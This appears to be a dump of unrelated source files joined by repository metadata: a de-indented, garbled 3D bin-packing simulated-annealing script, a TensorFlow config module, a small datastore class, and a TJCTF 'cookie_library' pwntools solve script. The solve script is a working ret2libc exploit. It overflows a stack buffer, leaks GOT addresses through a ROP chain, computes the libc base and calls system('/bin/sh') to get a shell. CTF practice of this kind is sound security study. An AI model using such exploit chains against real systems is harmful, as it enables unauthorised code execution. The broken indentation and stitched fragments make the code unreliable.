randS = random.choice([0,1,2])
itemtoChnage = np.random.randint(0, len(lis))
if randS == 0:
randUni = np.random.randint(0, Ls2[randS])
if randUni+lis[itemtoChnage]['x']<= Ls2[randS]:
cis[itemtoChnage][randS] = randUni
break
elif randS == 1:
randUni = np.random.randint(0, Ls2[randS])
if randUni+lis[itemtoChnage]['y']<= Ls2[randS]:
cis[itemtoChnage][randS] = randUni
break
elif randS == 2:
ss = 0
for item in range(len(lis)):
ss += lis[item]['z']
#print(ss)
randUni = np.random.randint(0, 1.25*ss)
if randUni+lis[itemtoChnage]['z']<= ss:
cis[itemtoChnage][randS] = randUni
break
return cis
def evaluate(cis,lis):
summ = 0
# for item in range(len(lis)):
# summ +=cis[item][2]+lis[item]['z']
for item in range(len(lis)):
for item2 in range(item+1, len(lis)):
if (cis[item2][0] <= lis[item]['x']+cis[item][0] <= lis[item2]['x']+cis[item2][0] and cis[item][0]>=cis[item2][0]):
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item]['x'] * lis[item]['y'] * lis[item2]['z']
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
       if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
         #the item is completely within item2
         summ += lis[item]['x'] * lis[item2]['y'] * lis[item]['z']
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
         #bottom side of item is out of item2
         summ += lis[item]['x'] * lis[item2]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
         #upper side of item is out of item2 and bottom side within item2
         summ += lis[item]['x'] * lis[item2]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
         #upper side of item is out of item2 and bottom side out of item2
         summ += lis[item]['x'] * lis[item2]['y'] * lis[item2]['z']
      if (cis[item2][0] <= lis[item]['x']+cis[item][0] <= lis[item2]['x']+cis[item2][0] and cis[item][0]<cis[item2][0]):
       if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
         #the item is completely within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item]['y'] * lis[item]['z']
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
         #bottom side of item is out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
         #upper side of item is out of item2 and bottom side within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
         #upper side of item is out of item2 and bottom side out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item]['y'] * lis[item2]['z']
       if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
         #the item is completely within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
         #bottom side of item is out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
         #upper side of item is out of item2 and bottom side within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
         #upper side of item is out of item2 and bottom side out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
       if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
         #the item is completely within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
         #bottom side of item is out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
         #upper side of item is out of item2 and bottom side within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
         #upper side of item is out of item2 and bottom side out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
       if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
         #the item is completely within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item2]['y'] * lis[item]['z']
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
         #bottom side of item is out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item2]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
         #upper side of item is out of item2 and bottom side within item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item2]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
         #upper side of item is out of item2 and bottom side out of item2
         summ += (lis[item]['x']+cis[item][0] - cis[item2][0]) * lis[item2]['y'] * lis[item2]['z']
if (lis[item2]['x']+cis[item2][0] <= lis[item]['x']+cis[item][0] and cis[item2][0]<=cis[item][0]<=cis[item2][0]+lis[item2]['x']):
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item]['y'] * lis[item2]['z']
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
       if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
         #the item is completely within item2
         summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item2]['y'] * lis[item]['z']
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
         #bottom side of item is out of item2
         summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item2]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
         #upper side of item is out of item2 and bottom side within item2
         summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item2]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
         #upper side of item is out of item2 and bottom side out of item2
         summ += (lis[item2]['x']+cis[item2][0] - cis[item][0]) * lis[item2]['y'] * lis[item2]['z']
if (lis[item2]['x']+cis[item2][0] <= lis[item]['x']+cis[item][0] and cis[item][0]<cis[item2][0]):
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]>=cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * lis[item]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * lis[item]['y'] * lis[item2]['z']
if (cis[item2][1] <= lis[item]['y']+cis[item][1] <= lis[item2]['y']+cis[item2][1] and cis[item][1]<cis[item2][1]):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * (lis[item]['y']+cis[item][1] - cis[item2][1]) * lis[item2]['z']
if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item2][1]<=cis[item][1]<=cis[item2][1]+lis[item2]['y']):
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
#the item is completely within item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item]['z']
if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
#bottom side of item is out of item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item]['z']+cis[item][2] - cis[item2][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
#upper side of item is out of item2 and bottom side within item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * (lis[item2]['z']+cis[item2][2] - cis[item][2])
if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
#upper side of item is out of item2 and bottom side out of item2
summ += lis[item2]['x'] * (lis[item2]['y']+cis[item2][1] - cis[item][1]) * lis[item2]['z']
       if (lis[item2]['y']+cis[item2][1] <= lis[item]['y']+cis[item][1] and cis[item][1]<cis[item2][1]):
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]>=cis[item2][2]):
         #the item is completely within item2
         summ += lis[item2]['x'] * lis[item2]['y'] * lis[item]['z']
        if (cis[item2][2] <= lis[item]['z']+cis[item][2] <= lis[item2]['z']+cis[item2][2] and cis[item][2]<cis[item2][2]):
         #bottom side of item is out of item2
         summ += lis[item2]['x'] * lis[item2]['y'] * (lis[item]['z']+cis[item][2] - cis[item2][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item2][2]<=cis[item][2]<=cis[item2][2]+lis[item2]['z']):
         #upper side of item is out of item2 and bottom side within item2
         summ += lis[item2]['x'] * lis[item2]['y'] * (lis[item2]['z']+cis[item2][2] - cis[item][2])
        if (lis[item2]['z']+cis[item2][2] <= lis[item]['z']+cis[item][2] and cis[item][2]<cis[item2][2]):
         #upper side of item is out of item2 and bottom side out of item2
         summ += lis[item2]['x'] * lis[item2]['y'] * lis[item2]['z']
return summ
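# For reference, the case analysis above is equivalent to the standard
# axis-wise overlap formula; a minimal sketch (helper names are ours, not
# part of the original code):
#  def overlap_1d(lo1, len1, lo2, len2):
#      return max(0, min(lo1 + len1, lo2 + len2) - max(lo1, lo2))
#  overlap volume of item and item2 = overlap_1d along x * along y * along z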
def main(cis, lis):
BEST = evaluate(cis, lis)
best = BEST
    CIS = cis  # fall back to the starting layout if annealing never improves it
t = 100000
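    # Simulated annealing: improving layouts are always accepted, and worse
    # ones are accepted with probability exp(-diff/t) (Metropolis rule) while
    # the temperature t decays geometrically by a factor of .99995 per step.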
for r in range(250000):
#print(f"best={BEST}")
if (BEST == 0):
print("bin feasible")
break
newcis = neighbour(cis, lis)
newbest = evaluate(newcis, lis)
#print(f"newbest={newbest}")
if (newbest <= best):
if (newbest <= BEST):
BEST = newbest
CIS = newcis
best = newbest
cis = newcis
t *=.99995
continue
else:
diff = -best + newbest
metro = exp(-diff/t)
#print(metro)
if np.random.rand() < metro:
best = newbest
cis = newcis
t *=.99995
continue
return CIS
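# Cluster items into bags by their (x, y, z) sizes with KMeans, choosing k via
# the elbow method (KElbowVisualizer, presumably imported from yellowbrick
# above), then anneal a placement for each bag separately.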
model = KMeans()
visualizer = KElbowVisualizer(model, k=(1,NUM_ITEMS-1))
visualizer.fit(np.array(lis2))
kmeans = KMeans(n_clusters=visualizer.elbow_value_, random_state=0).fit(lis2)
bags = []
for g in range(visualizer.elbow_value_):
bag = []
for gg in range(len(kmeans.labels_)):
if kmeans.labels_[gg] == g:
bag.append(lis2[gg])
bags.append(bag)
cis_bags = []
counter = 0
for bag in bags:
counter += 1
print(counter)
ncis = [[0,0,0] for i in range(len(bag))]
ba = {r :{'x': bag[r][0], 'y':bag[r][1], 'z':bag[r][2]} for r in range(len(bag))}
ncis = main(ncis, ba)
cis_bags.append(ncis) | [
"[email protected]"
] | |
33fbb50db9e6331092d5842b505407c2c4836161 | 683c3c5f256f115f5c3547b9482cbd5ef2b63d23 | /2020/TJCTF/6_cookie_library_solve.py | 61af9d19cfbf76d08159350ceec1ff30b9230e39 | [] | no_license | yueJDy/pwn | eb1e7292c4fb6d34f65e976742abb390730e8a1d | 32d0e748dd6d2c2327e5175fc34a1784b67b83a5 | refs/heads/master | 2021-08-11T04:09:42.688560 | 2021-04-16T09:00:40 | 2021-04-16T09:00:40 | 248,710,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 898 | py | from pwn import *
r = process('./cookie_library')
raw_input('debug')
rop_rdi = 0x400933
puts_got = 0x600fb8
printf_got = 0x600fc8
puts_plt = 0x400640
printf_offset = 0x055810
system_offset = 0x0453a0
binsh_offset = 0x18ce17
main = 0x400797
def func(rdi):
buf = 'a'*0x58
buf += p64(rop_rdi) + p64(rdi) + p64(puts_plt) + p64(main)
r.sendlineafter('Which is the most tasty?', buf)
r.recvuntil('be friends anymore\n')
res = r.recv(6) + '\x00'*2
leak = u64(res)
return leak
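# Stage 1 of a classic ret2libc: func() overflows the 0x58-byte buffer, uses
# the pop-rdi gadget to point rdi at a GOT entry, calls puts@plt to leak the
# resolved libc address, then returns to main for another round of input.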
puts_add = func(puts_got)
log.info('puts_add = %#x' %puts_add)
printf_add = func(printf_got)
log.info('printf_add = %#x' %printf_add)
libc_base = printf_add - printf_offset
system_add = system_offset + libc_base
binsh_add = binsh_offset + libc_base
buf = 'a'*0x58
buf += p64(rop_rdi) + p64(binsh_add) + p64(system_add) + p64(main)
r.sendlineafter('Which is the most tasty?', buf)
r.interactive()
r.close()
# FLAG | [
"[email protected]"
] | |
56086c6802414a299cbe663e8adbf2869d183fca | a372318f7debad1fd5cd0f9937b6532f17101d7e | /config.py | a1799aaffa1fad127010c4fd4b739ac11814e2c0 | [] | no_license | xingjiliang/remote_hub | 51c8f5c44a6e577eb1dfa1b652dc9c1fae99e9c6 | e5ec040c80ac559cfeee112e1e21c1c5685ec6c5 | refs/heads/master | 2020-04-11T15:12:05.759842 | 2018-12-18T09:44:39 | 2018-12-18T09:44:39 | 160,143,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,630 | py | import sys
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_bool('remains', True, 'predict remains of one day or full day')
tf.app.flags.DEFINE_string('model_name', 'rnnV3', 'model name')
tf.app.flags.DEFINE_integer('city_id', 1, 'city id')
tf.app.flags.DEFINE_string('train_start_date', '2018-03-19', 'train start date')
tf.app.flags.DEFINE_string('train_end_date', '2018-08-16', 'train end date')
tf.app.flags.DEFINE_bool('load_previous_model', False, 'load_previous_model')
tf.app.flags.DEFINE_integer('previous_model_epoch_times', None, 'previous_model_epoch_times')
tf.app.flags.DEFINE_float('learning_rate', 1.0, 'learning rate')
tf.app.flags.DEFINE_float('keep_prob', 0.5, 'keep prob')
tf.app.flags.DEFINE_float('l2_lambda', 1e-5, 'l2 lambda')
tf.app.flags.DEFINE_integer('batch_size', 64, 'batch size')
tf.app.flags.DEFINE_integer('num_epochs', 1000, 'epoch times')
tf.app.flags.DEFINE_bool('evaluate_when_training', True, 'evaluate when training')
tf.app.flags.DEFINE_integer('test_data_batch_size', 64, 'test data batch size')
tf.app.flags.DEFINE_string('test_start_date', '2018-08-16', 'test start date')
tf.app.flags.DEFINE_string('test_end_date', '2018-09-21', 'test end date')
origin_dataset_dir = "origin_dataset"
dataset_dir = "dataset"
model_graph_dir = "model_graphs"
model_params_dir = "models"
result_dir = "results"
dateset_start_date = '2017-03-03'
holidays = [
'2017-04-02',
'2017-04-03',
'2017-04-04',
'2017-04-29',
'2017-04-30',
'2017-05-01',
'2017-05-28',
'2017-05-29',
'2017-05-30',
'2017-10-01',
'2017-10-02',
'2017-10-03',
'2017-10-04',
'2017-10-05',
'2017-10-06',
'2017-10-07',
'2017-10-08',
'2017-12-30',
'2017-12-31',
'2018-01-01',
'2018-02-15',
'2018-02-16',
'2018-02-17',
'2018-02-18',
'2018-02-19',
'2018-02-20',
'2018-02-21',
'2018-04-05',
'2018-04-06',
'2018-04-07',
'2018-04-29',
'2018-04-30',
'2018-05-01',
'2018-06-16',
'2018-06-17',
'2018-06-18',
'2018-09-22',
'2018-09-23',
'2018-09-24',
'2018-10-01',
'2018-10-02',
'2018-10-03',
'2018-10-04',
'2018-10-05',
'2018-10-06',
'2018-10-07']
end_of_holidays = [
'2017-04-04',
'2017-05-01',
'2017-05-30',
'2017-10-08',
'2018-01-01',
'2018-02-21',
'2018-04-07',
'2018-05-01',
'2018-06-18',
'2018-09-24',
'2018-10-07']
weekend_weekdays = [
'2017-04-01',
'2017-05-27',
'2017-09-30',
'2018-02-11',
'2018-02-24',
'2018-04-08',
'2018-04-28',
'2018-09-29',
'2018-09-30']
| [
"[email protected]"
] | |
4bdafadc03bd119cf1cf2ca6333044faa8767d51 | 5766681f62dacc8bb75707c38aef6498b222c63f | /betl/io/DatastoreClass_file.py | 0e03b70a9c2de030f402a0d392d1fb2756d563e5 | [] | no_license | brianspurling/betl | dd3f1eafd9ea606cbf078c46ae6d6c4954b4d1d1 | 536370382ec1dadaa0d6b42a22f169c3cbb4bea3 | refs/heads/master | 2022-12-10T09:41:39.478068 | 2019-06-28T09:11:07 | 2019-06-28T09:11:07 | 113,907,286 | 1 | 1 | null | 2022-12-08T01:01:41 | 2017-12-11T20:52:19 | Python | UTF-8 | Python | false | false | 513 | py | from .DatastoreClass import Datastore
class FileDatastore(Datastore):
def __init__(self, fileSysID, path, fileExt, delim, quotechar,
isSrcSys=False):
Datastore.__init__(self,
datastoreID=fileSysID,
datastoreType='FILESYSTEM',
isSrcSys=isSrcSys)
self.fileSysID = fileSysID
self.path = path
self.fileExt = fileExt
self.delim = delim
self.quotechar = quotechar
